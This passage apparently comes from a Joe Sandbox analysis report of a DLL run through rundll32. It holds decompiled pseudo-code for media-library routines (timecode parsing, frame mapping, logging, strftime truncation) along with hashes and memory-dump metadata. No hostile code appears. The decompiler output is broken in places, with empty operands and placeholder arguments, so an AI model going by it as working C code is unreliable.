                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log
                                                      • String ID: %d:%d:%d%c%d$Drop frame is only allowed with multiples of 30000/1001 FPS$Unable to parse timecode, syntax: hh:mm:ss[:;.]ff$Using non-standard frame rate %d/%d$Valid timecode frame rate must be specified. Minimum value is 1$gfff
                                                      • API String ID: 2418673259-2042051344
                                                      • Opcode ID: 376a6e0f90061a24e2ad68bb5ac7123712083f15859e3ba11df8d7ef79b39b28
                                                      • Instruction ID: 2dccc3d4a2f57473898200d4d9d73c3d244c783664df16274e88938e09edcc61
                                                      • Opcode Fuzzy Hash: 376a6e0f90061a24e2ad68bb5ac7123712083f15859e3ba11df8d7ef79b39b28
                                                      • Instruction Fuzzy Hash: 7C6193719087498BC760CF68C580B4EBBE1FB84350F25893FE999DB351D674EE409B86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 45%
                                                      			E1001E2F0(intOrPtr _a4, char _a8) {
                                                      				char _v16;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v48;
                                                      				char* _v52;
                                                      				char _v56;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				intOrPtr _t37;
                                                      				intOrPtr _t38;
                                                      				intOrPtr _t39;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t45;
                                                      				char _t46;
                                                      				intOrPtr _t49;
                                                      				char _t58;
                                                      				intOrPtr* _t63;
                                                      				intOrPtr _t64;
                                                      				intOrPtr _t70;
                                                      				intOrPtr _t71;
                                                      				void* _t72;
                                                      				intOrPtr* _t73;
                                                      
                                                      				_t73 = _t72 - 0x34;
                                                      				_t37 = _a4;
                                                      				_t58 = _a8;
                                                      				_t71 =  *((intOrPtr*)(_t37 + 4));
                                                      				_t63 =  *((intOrPtr*)(_t71 + 4));
                                                      				_t61 =  *((intOrPtr*)(_t63 + 0xc));
                                                      				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
                                                      					_t64 =  *_t63;
                                                      					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
                                                      					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
                                                      						_t38 = 0xffffffd8;
                                                      						goto L7;
                                                      					} else {
                                                      						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
                                                      							_t38 = 0xffffffea;
                                                      							goto L7;
                                                      						} else {
                                                      							 *_t73 = _t37;
                                                      							_t39 = L10009FC0(_t58, _t62);
                                                      							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
                                                      							if(_t39 == 0) {
                                                      								goto L6;
                                                      							} else {
                                                      								_v56 = _t58;
                                                      								 *_t73 = _t71;
                                                      								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
                                                      								if(_t42 < 0) {
                                                      									_v32 = _t42;
                                                      									 *_t73 = _t58 + 0x128;
                                                      									E1000A000(_t58 + 0x128, _t71);
                                                      									_t38 = _v32;
                                                      									goto L7;
                                                      								} else {
                                                      									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
                                                      									return 0;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
                                                      					 *_t73 = _t37;
                                                      					_t45 = L10009FC0(_t58, _t61);
                                                      					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
                                                      					if(_t45 == 0) {
                                                      						L6:
                                                      						_t38 = 0xfffffff4;
                                                      						goto L7;
                                                      					} else {
                                                      						_t46 = L1001AC40(_t58, _t70, _t71);
                                                      						_v16 = _t46;
                                                      						if(_t46 == 0) {
                                                      							goto L6;
                                                      						} else {
                                                      							_v56 = _t46;
                                                      							_v52 = 0;
                                                      							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
                                                      							_t49 = E1001E2F0();
                                                      							if(_t49 < 0) {
                                                      								L13:
                                                      								_v32 = _t49;
                                                      								 *_t73 =  &_v16;
                                                      								L1001ADB0(_t58);
                                                      								return _v32;
                                                      							} else {
                                                      								 *_t73 = _t58;
                                                      								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
                                                      								_v56 = _v16;
                                                      								_t49 = E1001E0B0(_t58, _t70, _t71);
                                                      								if(_t49 == 0) {
                                                      									goto L13;
                                                      								} else {
                                                      									_v48 = _t49;
                                                      									_v32 = _t49;
                                                      									_v56 = 0x10;
                                                      									_v52 = "Failed to map frame into derived frame context: %d.\n";
                                                      									 *_t73 = _t71;
                                                      									L10023A40();
                                                      									 *_t73 =  &_v16;
                                                      									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
                                                      									_t38 = _v32;
                                                      									L7:
                                                      									return _t38;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      • mv_frame_alloc.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E32A
                                                        • Part of subcall function 1001AC40: mv_malloc.MAIN ref: 1001AC56
                                                      • mv_hwframe_get_buffer.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E34A
                                                        • Part of subcall function 1001E2F0: mv_hwframe_map.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E36C
                                                        • Part of subcall function 1001E2F0: mv_log.MAIN ref: 1001E396
                                                        • Part of subcall function 1001E2F0: mv_frame_free.MAIN ref: 1001E3A2
                                                      • mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E317
                                                        • Part of subcall function 10009FC0: mv_mallocz.MAIN ref: 10009FD2
                                                      • mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E3D3
                                                      Strings
                                                      • Failed to map frame into derived frame context: %d., xrefs: 1001E37D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_buffer_ref$mv_frame_allocmv_frame_freemv_hwframe_get_buffermv_hwframe_mapmv_logmv_mallocmv_mallocz
                                                      • String ID: Failed to map frame into derived frame context: %d.
                                                      • API String ID: 2770197599-2491951210
                                                      • Opcode ID: b982bc6816b3afb20851306c66ddb92193a8adb26d1f7859c5dff6e59dc61fb9
                                                      • Instruction ID: 9b451d42297ff9da348d1ac60a3a70938ed94ec3f991f54ec8aa55de9da18352
                                                      • Opcode Fuzzy Hash: b982bc6816b3afb20851306c66ddb92193a8adb26d1f7859c5dff6e59dc61fb9
                                                      • Instruction Fuzzy Hash: 0041F5B46087418FD740DF29D48055FBBE0FF88350F05892DE9A98B345EB34E9818F82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strcmp$mv_d2qmv_expr_parse_and_evalmv_parse_ratio
                                                      • String ID: ntsc
                                                      • API String ID: 2874497773-2045543799
                                                      • Opcode ID: 83ae849ea13b95b91902b7d20c8a5323a228a97e6b021accf889ee30e99a21e1
                                                      • Instruction ID: f84328928982e3785df4aaf20589b6ac80a434cb6b10c7022aa99fc1399d0474
                                                      • Opcode Fuzzy Hash: 83ae849ea13b95b91902b7d20c8a5323a228a97e6b021accf889ee30e99a21e1
                                                      • Instruction Fuzzy Hash: 9031FBB89893819AD750EF29A54161BB6E4EF44380F968C2EA9CCC7340DF74DD40EB53
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLock$Releasemv_mallocz$Acquire
                                                      • String ID:
                                                      • API String ID: 2881747546-0
                                                      • Opcode ID: 0d1f996a099190dbcac24ef498fb0996fadf9c399d392a80c4173242cb49765f
                                                      • Instruction ID: e8e0c9d1389fe9fc4d2fa8f13575414dd6078b243068f84da3cacd96059e79d8
                                                      • Opcode Fuzzy Hash: 0d1f996a099190dbcac24ef498fb0996fadf9c399d392a80c4173242cb49765f
                                                      • Instruction Fuzzy Hash: B36138B49087018FE714DF25C48170BBBE1EF85380F12866DE8998B35ADB74E981CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 40%
                                                      			E10023649(void* __edi, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
                                                      				signed int _t63;
                                                      				signed int _t67;
                                                      				signed int _t70;
                                                      				signed int _t73;
                                                      				signed int _t76;
                                                      				signed int _t81;
                                                      				void* _t84;
                                                      				signed char* _t85;
                                                      				int _t87;
                                                      				signed char* _t88;
                                                      				intOrPtr _t92;
                                                      				signed char* _t93;
                                                      				char* _t102;
                                                      				signed char* _t103;
                                                      				signed char* _t104;
                                                      				signed char* _t105;
                                                      				signed char* _t106;
                                                      				char* _t107;
                                                      				char* _t122;
                                                      				signed int _t123;
                                                      				char* _t125;
                                                      				signed char* _t130;
                                                      				signed char** _t132;
                                                      
                                                      				_t130 = __ebp;
                                                      				if(( *0x100d568c & 0x00000002) != 0) {
                                                      					_t51 = _a5204 + 8; // 0x101
                                                      					__edx = _t51;
                                                      					__eax = 0x100b367b;
                                                      					if(__edx <= 0x40) {
                                                      						__eax =  *((intOrPtr*)(0x100b3880 + __edx * 4));
                                                      					}
                                                      					_a8 = __eax;
                                                      					__eax = "[%s] ";
                                                      					_a4 = "[%s] ";
                                                      					 *__esp = __edi;
                                                      					__eax = L100089C0();
                                                      				}
                                                      				 *_t132 = _t130;
                                                      				_a8 = _a5212;
                                                      				_a4 = _a5208;
                                                      				L10008B70();
                                                      				_t107 = _a1072;
                                                      				_t102 = _a2096;
                                                      				_t122 = _a3120;
                                                      				_t125 = _a4144;
                                                      				if( *_t107 != 0 ||  *_t102 != 0 ||  *_t122 != 0 ||  *_t125 != 0) {
                                                      					_t92 = _a4148;
                                                      					_t63 = 0;
                                                      					if(_t92 != 0 && _a4152 >= _t92) {
                                                      						_t63 = (0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000a |  *(_t125 + _t92 - 1) & 0 | ( *(_t125 + _t92 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
                                                      					}
                                                      					 *0x100aa00c = _t63;
                                                      				}
                                                      				_a24 = _t125;
                                                      				_t93 =  &_a48;
                                                      				_a8 = "%s%s%s%s";
                                                      				_a20 = _t122;
                                                      				_a16 = _t102;
                                                      				_a12 = _t107;
                                                      				_a4 = 0x400;
                                                      				 *_t132 = _t93;
                                                      				L10022FC0();
                                                      				_t67 =  *0x100d5680;
                                                      				if(_t67 == 0) {
                                                      					 *_t132 = 2;
                                                      					L1009DD30();
                                                      					asm("sbb eax, eax");
                                                      					 *0x100d5680 = _t67 | 0x00000001;
                                                      				}
                                                      				_t123 =  *0x100aa00c; // 0x1
                                                      				_t126 =  *0x100d5260;
                                                      				if(_t123 == 0 || ( *0x100d568c & 0x00000001) == 0) {
                                                      					L12:
                                                      					if(_t126 > 0) {
                                                      						 *_t132 = 2;
                                                      						_t123 = 0;
                                                      						_t85 =  *0x100aa0cc();
                                                      						_a8 = _t126;
                                                      						_t126 = "    Last message repeated %d times\n";
                                                      						_a4 = "    Last message repeated %d times\n";
                                                      						 *_t132 = _t85;
                                                      						L10022AF0();
                                                      						 *0x100d5260 = 0;
                                                      					}
                                                      					_a4 = _t93;
                                                      					 *_t132 = 0x100d5280;
                                                      					strcpy(??, ??);
                                                      					_t103 = _a1072;
                                                      					_t70 =  *_t103 & 0x000000ff;
                                                      					if(_t70 == 0) {
                                                      						L20:
                                                      						L10022C90(_a40, _t93, _t103, 0, _t123, _t126);
                                                      						_t104 = _a2096;
                                                      						_t73 =  *_t104 & 0x000000ff;
                                                      						if(_t73 == 0) {
                                                      							L26:
                                                      							L10022C90(_a44, _t93, _t104, 0, _t123, _t126);
                                                      							_t105 = _a3120;
                                                      							_t76 =  *_t105 & 0x000000ff;
                                                      							if(_t76 == 0) {
                                                      								L32:
                                                      								_t128 = _a36 >> 8;
                                                      								_t96 =  >  ? 7 : _a5204 >> 3;
                                                      								_t97 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
                                                      								L10022C90( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t105, _a36 >> 8, _t123, _a36 >> 8);
                                                      								_t106 = _a4144;
                                                      								_t81 =  *_t106 & 0x000000ff;
                                                      								if(_t81 == 0) {
                                                      									L38:
                                                      									L10022C90(_t97, _t97, _t106, _t128, _t123, _t128);
                                                      									goto L39;
                                                      								}
                                                      								L34:
                                                      								while(_t81 - 0xe > 0x11 && _t81 > 7) {
                                                      									_t81 = _t106[1] & 0x000000ff;
                                                      									_t106 =  &(_t106[1]);
                                                      									if(_t81 != 0) {
                                                      										continue;
                                                      									}
                                                      									L37:
                                                      									_t106 = _a4144;
                                                      									goto L38;
                                                      								}
                                                      								 *_t106 = 0x3f;
                                                      								_t106 =  &(_t106[1]);
                                                      								_t81 =  *_t106 & 0x000000ff;
                                                      								if(_t81 != 0) {
                                                      									goto L34;
                                                      								}
                                                      								goto L37;
                                                      							}
                                                      							L28:
                                                      							while(_t76 - 0xe > 0x11 && _t76 > 7) {
                                                      								_t76 = _t105[1] & 0x000000ff;
                                                      								_t105 =  &(_t105[1]);
                                                      								if(_t76 != 0) {
                                                      									continue;
                                                      								}
                                                      								L31:
                                                      								_t105 = _a3120;
                                                      								goto L32;
                                                      							}
                                                      							 *_t105 = 0x3f;
                                                      							_t105 =  &(_t105[1]);
                                                      							_t76 =  *_t105 & 0x000000ff;
                                                      							if(_t76 != 0) {
                                                      								goto L28;
                                                      							}
                                                      							goto L31;
                                                      						}
                                                      						L22:
                                                      						while(_t73 - 0xe > 0x11 && _t73 > 7) {
                                                      							_t73 = _t104[1] & 0x000000ff;
                                                      							_t104 =  &(_t104[1]);
                                                      							if(_t73 != 0) {
                                                      								continue;
                                                      							}
                                                      							L25:
                                                      							_t104 = _a2096;
                                                      							goto L26;
                                                      						}
                                                      						 *_t104 = 0x3f;
                                                      						_t104 =  &(_t104[1]);
                                                      						_t73 =  *_t104 & 0x000000ff;
                                                      						if(_t73 != 0) {
                                                      							goto L22;
                                                      						}
                                                      						goto L25;
                                                      					} else {
                                                      						L16:
                                                      						while(_t70 - 0xe > 0x11 && _t70 > 7) {
                                                      							_t70 = _t103[1] & 0x000000ff;
                                                      							_t103 =  &(_t103[1]);
                                                      							if(_t70 != 0) {
                                                      								continue;
                                                      							}
                                                      							L19:
                                                      							_t103 = _a1072;
                                                      							goto L20;
                                                      						}
                                                      						 *_t103 = 0x3f;
                                                      						_t103 =  &(_t103[1]);
                                                      						_t70 =  *_t103 & 0x000000ff;
                                                      						if(_t70 != 0) {
                                                      							goto L16;
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      				} else {
                                                      					 *_t132 = _t93;
                                                      					_t106 = 0x100d5280;
                                                      					_a4 = 0x100d5280;
                                                      					_t87 = strcmp(??, ??);
                                                      					if(_t87 != 0) {
                                                      						goto L12;
                                                      					}
                                                      					if(_a48 != 0) {
                                                      						 *_t132 = _t93;
                                                      						L1009DCB0();
                                                      						if( *((char*)(_t132 + _t87 + 0x2f)) == 0xd) {
                                                      							goto L12;
                                                      						}
                                                      						_t128 =  &(_t126[1]);
                                                      						 *0x100d5260 = _t128;
                                                      						if( *0x100d5680 == 1) {
                                                      							 *_t132 = 2;
                                                      							_t88 =  *0x100aa0cc();
                                                      							_a8 = _t128;
                                                      							_a4 = "    Last message repeated %d times\r";
                                                      							 *_t132 = _t88;
                                                      							L10022AF0();
                                                      						}
                                                      						L39:
                                                      						 *_t132 = _t130;
                                                      						_a4 = 0;
                                                      						_t84 = E10009690(0, _t106, _t123, _t128);
                                                      						 *_t132 = 0x100d5690;
                                                      						L1009DE50();
                                                      						return _t84;
                                                      					}
                                                      					goto L12;
                                                      				}
                                                      			}



























                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
                                                      • String ID: Last message repeated %d times$%s%s%s%s$[%s]
                                                      • API String ID: 4275616186-1378087399
                                                      • Opcode ID: d0df824065387cbc24c48f67f203688572bdbcaedd198ee8c4ff34e36a2db307
                                                      • Instruction ID: 3a5394bdbcfdd3d39a4a44ba34fc3df736875c3267acf4b9896f0e29f48a5ef2
                                                      • Opcode Fuzzy Hash: d0df824065387cbc24c48f67f203688572bdbcaedd198ee8c4ff34e36a2db307
                                                      • Instruction Fuzzy Hash: B161BE749087959FD720DF24D4803AABBE2FF85384F95884EE8C957342C736E985CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 36%
                                                      			E10009130() {
                                                      				int _t86;
                                                      				void* _t91;
                                                      				void* _t93;
                                                      				signed char _t99;
                                                      				void* _t111;
                                                      				signed char _t113;
                                                      				void* _t114;
                                                      				void* _t118;
                                                      				signed char _t119;
                                                      				void* _t121;
                                                      				int _t122;
                                                      				void* _t123;
                                                      				unsigned int _t124;
                                                      				unsigned int _t125;
                                                      				signed int _t126;
                                                      				void* _t130;
                                                      				void* _t131;
                                                      				int _t132;
                                                      				void* _t136;
                                                      				signed char _t139;
                                                      				signed char _t141;
                                                      				void* _t142;
                                                      				void* _t143;
                                                      				signed int _t144;
                                                      				int _t145;
                                                      				void* _t147;
                                                      				signed int _t148;
                                                      				signed int _t151;
                                                      				int _t153;
                                                      				signed int _t154;
                                                      				void _t158;
                                                      				void* _t159;
                                                      				char* _t161;
                                                      				void** _t162;
                                                      				void* _t165;
                                                      				void* _t166;
                                                      				void** _t167;
                                                      				void*** _t168;
                                                      
                                                      				_t86 = _t168[0x111];
                                                      				_t167 = _t168[0x110];
                                                      				if( *_t86 == 0) {
                                                      					L40:
                                                      					return _t86;
                                                      				} else {
                                                      					_t118 = _t167[2];
                                                      					while(1) {
                                                      						_t145 = _t167[1];
                                                      						_t88 =  <=  ? _t145 : _t118;
                                                      						_t121 = _t118 - ( <=  ? _t145 : _t118);
                                                      						if(_t121 != 0) {
                                                      							goto L15;
                                                      						}
                                                      						 *_t168 = _t168[0x111];
                                                      						_t9 = strlen(??) + 1; // 0x1
                                                      						_t159 = _t9;
                                                      						L11:
                                                      						_t124 = _t167[3];
                                                      						if(_t124 == _t118 || _t145 >= _t118) {
                                                      							L22:
                                                      							_t95 =  <=  ? _t118 : _t145;
                                                      							_t119 = _t118 - ( <=  ? _t118 : _t145);
                                                      							if(_t119 > 0x3ff) {
                                                      								L26:
                                                      								_t139 = _t119;
                                                      								_t147 =  *_t167 + _t145;
                                                      								if(_t119 >= 8) {
                                                      									if((_t147 & 0x00000001) != 0) {
                                                      										 *_t147 = 0x21;
                                                      										_t139 = _t119 - 1;
                                                      										_t147 = _t147 + 1;
                                                      									}
                                                      									if((_t147 & 0x00000002) != 0) {
                                                      										 *_t147 = 0x2121;
                                                      										_t139 = _t139 - 2;
                                                      										_t147 = _t147 + 2;
                                                      									}
                                                      									if((_t147 & 0x00000004) != 0) {
                                                      										 *_t147 = 0x21212121;
                                                      										_t139 = _t139 - 4;
                                                      										_t147 = _t147 + 4;
                                                      									}
                                                      									_t125 = _t139;
                                                      									_t139 = _t139 & 0x00000003;
                                                      									_t126 = _t125 >> 2;
                                                      									memset(_t147, 0x21212121, _t126 << 2);
                                                      									_t168 =  &(_t168[3]);
                                                      									_t147 = _t147 + _t126;
                                                      									if((_t139 & 0x00000004) == 0) {
                                                      										goto L29;
                                                      									} else {
                                                      										goto L28;
                                                      									}
                                                      									goto L40;
                                                      								} else {
                                                      									if((_t139 & 0x00000004) != 0) {
                                                      										L28:
                                                      										 *_t147 = 0x21212121;
                                                      										_t147 = _t147 + 4;
                                                      									}
                                                      								}
                                                      								L29:
                                                      								if((_t139 & 0x00000002) != 0) {
                                                      									 *_t147 = 0x2121;
                                                      									_t147 = _t147 + 2;
                                                      								}
                                                      								if((_t139 & 0x00000001) != 0) {
                                                      									 *_t147 = 0x21;
                                                      								}
                                                      								_t161 = "[truncated strftime output]";
                                                      								_t99 =  <=  ? _t119 : 0x1b;
                                                      								_t141 =  *_t167 + _t167[1];
                                                      								if(0x1b >= 4) {
                                                      									if((_t141 & 0x00000001) != 0) {
                                                      										_t141 = _t141 + 1;
                                                      										_t161 = "truncated strftime output]";
                                                      										_t99 = _t99 - 1;
                                                      										 *((char*)(_t141 - 1)) = "[truncated strftime output]" & 0x000000ff;
                                                      									}
                                                      									if((_t141 & 0x00000002) != 0) {
                                                      										_t148 =  *_t161 & 0x0000ffff;
                                                      										_t141 = _t141 + 2;
                                                      										_t161 =  &(_t161[2]);
                                                      										_t99 = _t99 - 2;
                                                      										 *(_t141 - 2) = _t148;
                                                      									}
                                                      									if(_t99 >= 4) {
                                                      										_t168[7] = _t99;
                                                      										_t131 = 0;
                                                      										_t151 = _t99 & 0xfffffffc;
                                                      										do {
                                                      											 *(_t141 + _t131) = _t161[_t131];
                                                      											_t131 = _t131 + 4;
                                                      										} while (_t131 < _t151);
                                                      										_t99 = _t168[7];
                                                      										_t141 = _t141 + _t131;
                                                      										_t161 =  &(_t161[_t131]);
                                                      									}
                                                      								}
                                                      								_t130 = 0;
                                                      								if((_t99 & 0x00000002) != 0) {
                                                      									_t130 = 2;
                                                      									 *_t141 =  *_t161 & 0x0000ffff;
                                                      								}
                                                      								if((_t99 & 0x00000001) != 0) {
                                                      									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
                                                      								}
                                                      								_t142 = _t167[1];
                                                      								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
                                                      								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
                                                      								_t136 = _t167[2];
                                                      								_t167[1] = 0xfffffffa;
                                                      								if(_t136 != 0) {
                                                      									L39:
                                                      									_t138 =  >  ? _t86 : _t136 - 1;
                                                      									_t93 =  *_t167;
                                                      									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
                                                      									return _t93;
                                                      								}
                                                      								goto L40;
                                                      							} else {
                                                      								_t162 =  &(_t168[8]);
                                                      								 *_t168 = _t162;
                                                      								_t168[3] = _t168[0x112];
                                                      								_t168[2] = _t168[0x111];
                                                      								_t86 = 0x400;
                                                      								_t168[1] = 0x400;
                                                      								L1009DCA8();
                                                      								if(0x400 != 0) {
                                                      									_t168[2] = _t162;
                                                      									_t168[1] = 0x100ac500;
                                                      									 *_t168 = _t167;
                                                      									return L100089C0();
                                                      								} else {
                                                      									if(_t119 != 0) {
                                                      										_t145 = _t167[1];
                                                      										goto L26;
                                                      									}
                                                      									goto L40;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
                                                      							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
                                                      							if(_t124 >> 1 >= _t118) {
                                                      								_t118 = _t118 + _t118;
                                                      							} else {
                                                      								_t118 = _t124;
                                                      							}
                                                      							if(_t118 < _t111) {
                                                      								_t115 =  <=  ? _t124 : _t111;
                                                      								_t118 =  <=  ? _t124 : _t111;
                                                      							}
                                                      							_t165 =  *_t167;
                                                      							_t168[1] = _t118;
                                                      							if(_t165 ==  &(_t167[4])) {
                                                      								 *_t168 = 0;
                                                      								_t113 = E10026280();
                                                      								if(_t113 == 0) {
                                                      									goto L21;
                                                      								} else {
                                                      									goto L19;
                                                      								}
                                                      							} else {
                                                      								 *_t168 = _t165;
                                                      								_t113 = E10026280();
                                                      								if(_t113 == 0) {
                                                      									L21:
                                                      									_t118 = _t167[2];
                                                      									_t145 = _t167[1];
                                                      									goto L22;
                                                      								} else {
                                                      									if(_t165 == 0) {
                                                      										L19:
                                                      										_t153 = _t167[1];
                                                      										_t143 = _t113;
                                                      										_t166 =  *_t167;
                                                      										_t132 = _t153 + 1;
                                                      										_t168[7] = _t166;
                                                      										if(_t132 >= 8) {
                                                      											if((_t113 & 0x00000001) != 0) {
                                                      												_t144 =  *_t166 & 0x000000ff;
                                                      												_t132 = _t153;
                                                      												_t166 = _t166 + 1;
                                                      												 *_t113 = _t144;
                                                      												_t82 = _t113 + 1; // 0x1
                                                      												_t143 = _t82;
                                                      											}
                                                      											if((_t143 & 0x00000002) != 0) {
                                                      												_t154 =  *_t166 & 0x0000ffff;
                                                      												_t143 = _t143 + 2;
                                                      												_t166 = _t166 + 2;
                                                      												_t132 = _t132 - 2;
                                                      												 *(_t143 - 2) = _t154;
                                                      											}
                                                      											if((_t143 & 0x00000004) != 0) {
                                                      												_t158 =  *_t166;
                                                      												_t143 = _t143 + 4;
                                                      												_t166 = _t166 + 4;
                                                      												_t132 = _t132 - 4;
                                                      												 *(_t143 - 4) = _t158;
                                                      											}
                                                      										}
                                                      										_t114 = memcpy(_t143, _t166, _t132);
                                                      										_t168 =  &(_t168[3]);
                                                      									}
                                                      									 *_t167 = _t114;
                                                      									_t167[2] = _t118;
                                                      									continue;
